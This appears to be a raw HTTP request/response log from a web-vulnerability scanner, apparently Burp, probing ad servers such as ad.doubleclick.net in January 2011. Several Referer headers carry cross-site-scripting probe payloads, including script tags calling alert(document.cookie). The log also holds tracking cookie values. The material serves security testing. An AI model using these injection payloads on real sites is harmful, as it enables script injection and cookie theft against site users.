GET /adi/N4270.Tribal_Fusion/B5094437.2;sz=728x90;click=http://a.tribalfusion.com/h.click/a7mNvB0GM0YcJY1cZbpnqvW2UQVWbMAUAQYQav0ScUrQtbx1dvqWP3N2GY50UYZcVATv4PZb8PmbE2dYn1dnLpdTM36MY5V3aVcQjWcF7SAFOWtY3Ubb45bEqWEUoVaJdQaZbZcRGJZbQU6vPWM8WcU25rmsndeO0tqIwxZbMVw/;ord=1115025470?\ HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 6223 Cache-Control: no-cache Pragma: no-cache Date: Fri, 28 Jan 2011 16:39:39 GMT Expires: Fri, 28 Jan 2011 16:39:39 GMT Connection: close
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... <!-- Code auto-generated on Fri Jan 14 13:32:32 EST 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script> ...[SNIP]... AUAQYQav0ScUrQtbx1dvqWP3N2GY50UYZcVATv4PZb8PmbE2dYn1dnLpdTM36MY5V3aVcQjWcF7SAFOWtY3Ubb45bEqWEUoVaJdQaZbZcRGJZbQU6vPWM8WcU25rmsndeO0tqIwxZbMVw/http://www.adobe.com/products/premiere/switch/?sdid=IEFXL"><img src="http://s0.2mdn.net/1295336/Adobe_DVSwitcher_MercEngine_728x90_img.jpg" width="728" height="90" border="0" alt="Advertisement" galleryimg="no"></a> ...[SNIP]...
GET /adi/N4270.Tribal_Fusion/B5094437.2;sz=728x90;click=http://a.tribalfusion.com/h.click/a7mNvB0GM0YcJY1cZbpnqvW2UQVWbMAUAQYQav0ScUrQtbx1dvqWP3N2GY50UYZcVATv4PZb8PmbE2dYn1dnLpdTM36MY5V3aVcQjWcF7SAFOWtY3Ubb45bEqWEUoVaJdQaZbZcRGJZbQU6vPWM8WcU25rmsndeO0tqIwxZbMVw/;ord=1115025470? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/blogs11ddd'%3balert(1)//e0aca46f7df/rangers/2011/01/live-chat-wednesday-at-2-pm Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Fri, 28 Jan 2011 14:48:52 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6204
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... <!-- Code auto-generated on Fri Jan 14 19:33:23 EST 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script> ...[SNIP]... YQav0ScUrQtbx1dvqWP3N2GY50UYZcVATv4PZb8PmbE2dYn1dnLpdTM36MY5V3aVcQjWcF7SAFOWtY3Ubb45bEqWEUoVaJdQaZbZcRGJZbQU6vPWM8WcU25rmsndeO0tqIwxZbMVw/http://www.adobe.com/products/creativesuite/design?sdid=IEFXL"><img src="http://s0.2mdn.net/1295336/Adobe_CS5_DPTruerEdge_728x90_img.jpg" width="728" height="90" border="0" alt="" galleryimg="no"></a> ...[SNIP]...
GET /adi/N5956.Advertising.com/B3941858.17;sz=728x90;click=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000778478/cstr=67706747=_4d436c28,4382457826,766161^778478^1183^0,1_/xsxdata=$xsxdata/bnum=67706747/optn=64?trg=;ord=4382457826? HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 6735 Cache-Control: no-cache Pragma: no-cache Date: Sat, 29 Jan 2011 05:19:53 GMT Expires: Sat, 29 Jan 2011 05:19:53 GMT Connection: close
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... <!-- Code auto-generated on Thu Oct 21 21:18:44 EDT 2010 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script> ...[SNIP]... click/site=0000766161/mnum=0000778478/cstr=67706747=_4d436c28,4382457826,766161^778478^1183^0,1_/xsxdata=$xsxdata/bnum=67706747/optn=64?trg=http%3a%2f%2fcapellalearning.net/default.aspx%3Fv%3Dunilong"><img src="http://s0.2mdn.net/2450389/capella_program_listings_728x90.gif" width="728" height="90" border="0" alt="" galleryimg="no"></a> ...[SNIP]...
GET /adj/N6103.135388.BIZO/B5185769.6;sz=728x90;click=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9d/3/0/%2a/b%3B235300643%3B0-0%3B0%3B59317886%3B3454-728/90%3B40364845/40382632/1%3Bu%3D%2Cbzo-57200543_1296226807%2C11d765b6a10b1b3%2Csports%2Cbzo.c9q-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l%3B%7Esscs%3D%3f;ord=7630304?\ HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 779 Cache-Control: no-cache Pragma: no-cache Date: Fri, 28 Jan 2011 16:40:06 GMT Expires: Fri, 28 Jan 2011 16:40:06 GMT Connection: close
document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3a9d/4/130/%2a/j;235207729;0-0;0;59034359;3454-728/90;40334076/40351863/1;u=,bzo-57200543_1296226807,11d765b6a10b1b3,sport ...[SNIP]... 57200543_1296226807%2C11d765b6a10b1b3%2Csports%2Cbzo.c9q-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l%3B%7Esscs%3D%3fhttp://www.supercutsfranchise.com"><img src="http://s0.2mdn.net/viewad/3050873/1-Chris_Accountant_728x90.gif" border=0 alt="Click here to find out more!"></a> ...[SNIP]...
GET /adj/N6103.135388.BIZO/B5185769.6;sz=728x90;click=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9d/3/0/%2a/b%3B235300643%3B0-0%3B0%3B59317886%3B3454-728/90%3B40364845/40382632/1%3Bu%3D%2Cbzo-57200543_1296226807%2C11d765b6a10b1b3%2Csports%2Cbzo.c9q-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l%3B~sscs%3D%3f;ord=7630304? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00241B)%3C/script%3E Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Fri, 28 Jan 2011 15:00:08 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 773
document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3a9d/4/12e/%2a/j;235207729;1-0;0;59034359;3454-728/90;40362690/40380477/1;u=,bzo-57200543_1296226807,11d765b6a10b1b3,sport ...[SNIP]... o-57200543_1296226807%2C11d765b6a10b1b3%2Csports%2Cbzo.c9q-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l%3B~sscs%3D%3fhttp://www.supercutsfranchise.com"><img src="http://s0.2mdn.net/viewad/3050873/Jim_Pharmacist_728x90.gif" border=0 alt="Click here to find out more!"></a> ...[SNIP]...
GET /adj/cm.rev_bostonherald/;net=cm;u=,cm-15223392_1296252139,11d765b6a10b1b3,ent,cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l-bk.rdst1-mm.aa1-mm.ac1-mm.ad1-mm.ae5-mm.af5-mm.ak1-mm.ap5-mm.aq1-mm.ar1-mm.au1-mm.da1-mm.db2-ex.32-ex.76-qc.a;;cmw=owl;sz=300x250;net=cm;env=ifr;ord1=463717;contx=ent;an=20;dc=w;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.sports_h;btg=cm.weath_l;btg=bk.rdst1;btg=mm.aa1;btg=mm.ac1;btg=mm.ad1;btg=mm.ae5;btg=mm.af5;btg=mm.ak1;btg=mm.ap5;btg=mm.aq1;btg=mm.ar1;btg=mm.au1;btg=mm.da1;btg=mm.db2;btg=ex.32;btg=ex.76;btg=qc.a;ord=0.47846851754002273? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Fri, 28 Jan 2011 22:02:21 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 1082
document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3a9d/0/0/%2a/v;234604289;0-0;58;44779888;4307-300/250;40086868/40104655/1;u=,cm-15223392_1296252139,11d765b6a10b1b3,ent,cm ...[SNIP]... cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.sports_h;btg=cm.weath_l;btg=bk.rdst1;btg=mm.aa1;btg=mm.ac1;btg=mm.ad1;btg=mm.ae5;btg=mm.af5;btg=mm.ak1;~aopt=2/0/ee/0;~sscs=%3fhttp://www.ntxhonda.com/"><img src="http://s0.2mdn.net/viewad/2980124/NTXH_ClickNGo_300X250_generic_Q1.gif" border=0 alt="Click here to find out more!"></a> ...[SNIP]...
GET /adj/fbi.wrgb.cbs6albany/classified;s1=classified;pos=1;dcode=fbi;pcode=wrgb;kw=;ref=oodle.com;test=;fci=ad;dcopt=;tile=1;sz=728x90;ord=3232293233741075? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cbs6albany.com/sections/thirdParty/iframe_header/?taxonomy=classified&cname=section&shier=classified&ghier=classified&trackbyurl=wrgb&usetitle=true&domain=cbs6albany.oodle.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sat, 29 Jan 2011 14:27:34 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 312
document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3a9e/0/0/%2a/c;234764637;0-0;0;36776316;3454-728/90;40474377/40492164/1;;~sscs=%3fhttp://mariacollege.edu/"><img src="http://s0.2mdn.net/viewad/2362004/Maria_728x90_AAD2-10_40K.jpg" border=0 alt="Click here to find out more!"></a> ...[SNIP]...
GET /adj/fbi.wrgb.cbs6albany/entertainment;s1=entertainment;pos=1;dcode=fbi;pcode=wrgb;kw=;ref=cbs6albany.com;test=;fci=ad;dcopt=;tile=1;sz=728x90;ord=9968673593830318? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cbs6albany.com/sections/thirdParty/iframe_header/?domain=events.cbs6albany.com&cname=zvents&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7Cevent&taxonomy=entertainment&trackstats=no Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sat, 29 Jan 2011 01:54:45 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 312
document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3a9e/0/0/%2a/m;234764637;0-0;0;36776750;3454-728/90;40474377/40492164/1;;~sscs=%3fhttp://mariacollege.edu/"><img src="http://s0.2mdn.net/viewad/2362004/Maria_728x90_AAD2-10_40K.jpg" border=0 alt="Click here to find out more!"></a> ...[SNIP]...
The response contains the following link to another domain:
http://s0.2mdn.net/viewad/2418884/WRGB728x90.jpg
Request
GET /adj/fbi.wrgb.cbs6albany/weather;s1=weather;pos=1;dcode=fbi;pcode=wrgb;kw=;ref=?burp;test=;fci=ad;dcopt=;tile=1;sz=728x90;ord=9032834577374160? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cbs6albany.com/albany-weather-forecast?dec0c'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E262a2c2a00e=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sat, 29 Jan 2011 13:38:16 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 302
document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3a9e/0/0/%2a/q;234748582;0-0;0;36777459;3454-728/90;40139686/40157473/1;;~sscs=%3fhttp://www.turningstone.com/"><img src="http://s0.2mdn.net/viewad/2418884/WRGB728x90.jpg" border=0 alt="Click here to find out more!"></a> ...[SNIP]...
GET /link.asp?cc=QAN007.310005.0&CreativeID=30281 HTTP/1.1 Host: adsfac.us Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: FSQAN007310005=uid=14877790; FSQAN007=pctl=310005&fpt=0%2C310005%2C&pct%5Fdate=4045&pctm=1&FL310005=1&FM30281=1&pctc=30281&FQ=1;
Response
HTTP/1.1 302 Object moved Cache-Control: private Content-Length: 276 Content-Type: text/html Expires: Sat, 29 Jan 2011 05:19:26 GMT Location: http://www.qantasvacations.com/sydney/?utm_campaign=SpectacularSydney&utm_medium=listing&utm_source=QFOnineAds&utm_content=&utm_term=sydney Server: Microsoft-IIS/7.0 Set-Cookie: FSQAN007=pctl=310005&FM30281=1&pdc=4045&pctc=30281&FQ=1&pctcrt=1&pctm=1&FL310005=1&fpt=0%2C310005%2C&pct%5Fdate=4045; expires=Tue, 01-Mar-2011 05:20:26 GMT; path=/ P3P: CP="NOI DSP COR NID CUR OUR NOR" Date: Sat, 29 Jan 2011 05:20:26 GMT Connection: close
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="http://www.qantasvacations.com/sydney/?utm_campaign=SpectacularSydney&utm_medium=listing&utm_source=QFOnineAds&utm_content=&utm_term=sydney">here</a> ...[SNIP]...
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 21:57:46 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 3192 Content-Type: application/x-javascript
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:57:10 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 3192 Content-Type: application/x-javascript Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e3445525d5f4f58455e445a4a423660;path=/
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:57:02 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 3189 Content-Type: application/x-javascript
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 00:26:36 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 3198 Content-Type: application/x-javascript
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:57:00 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 3183 Content-Type: application/x-javascript Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2645525d5f4f58455e445a4a423660;path=/
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 21:57:30 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 3192 Content-Type: application/x-javascript
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:57:01 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 3198 Content-Type: application/x-javascript Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660;path=/
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 00:55:12 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 3198 Content-Type: application/x-javascript
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:47:19 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 3198 Content-Type: application/x-javascript
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 03:16:00 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 3189 Content-Type: application/x-javascript
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 03:10:02 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 3189 Content-Type: application/x-javascript
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:57:01 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 3189 Content-Type: application/x-javascript Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2745525d5f4f58455e445a4a423660;path=/
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 23:08:31 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 3198 Content-Type: application/x-javascript Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e3545525d5f4f58455e445a4a423660;path=/
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 03:27:50 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 3198 Content-Type: application/x-javascript
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:59:03 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 3189 Content-Type: application/x-javascript
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:36:07 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 3198 Content-Type: application/x-javascript
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:57:01 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 3189 Content-Type: application/x-javascript
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 03:21:54 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 3198 Content-Type: application/x-javascript
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:01:21 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 3198 Content-Type: application/x-javascript
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:57:01 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 3189 Content-Type: application/x-javascript Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e6f45525d5f4f58455e445a4a423660;path=/
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 00:10:10 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 3189 Content-Type: application/x-javascript Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660;path=/
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 03:04:37 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 3198 Content-Type: application/x-javascript
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:57:02 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 3198 Content-Type: application/x-javascript Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2245525d5f4f58455e445a4a423660;path=/
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:32:01 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 3198 Content-Type: application/x-javascript Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660;path=/
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 00:22:28 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 3198 Content-Type: application/x-javascript
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:57:02 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 3189 Content-Type: application/x-javascript
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 00:51:06 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 3180 Content-Type: application/x-javascript Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e5145525d5f4f58455e445a4a423660;path=/
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:57:02 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 3180 Content-Type: application/x-javascript
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:41:25 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 3198 Content-Type: application/x-javascript
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:57:05 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 3192 Content-Type: application/x-javascript Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e6c45525d5f4f58455e445a4a423660;path=/
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:15:41 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 3192 Content-Type: application/x-javascript
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:19:46 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 3183 Content-Type: application/x-javascript
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:57:06 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 3183 Content-Type: application/x-javascript Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660;path=/
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:29:13 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 3174 Content-Type: application/x-javascript
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 03:09:57 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 3192 Content-Type: application/x-javascript
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:06:09 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 3192 Content-Type: application/x-javascript Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2045525d5f4f58455e445a4a423660;path=/
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:57:02 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 3192 Content-Type: application/x-javascript Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660;path=/
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:03:25 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 3192 Content-Type: application/x-javascript
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 00:01:57 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 3177 Content-Type: application/x-javascript Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e3f45525d5f4f58455e445a4a423660;path=/
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:57:02 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 3186 Content-Type: application/x-javascript
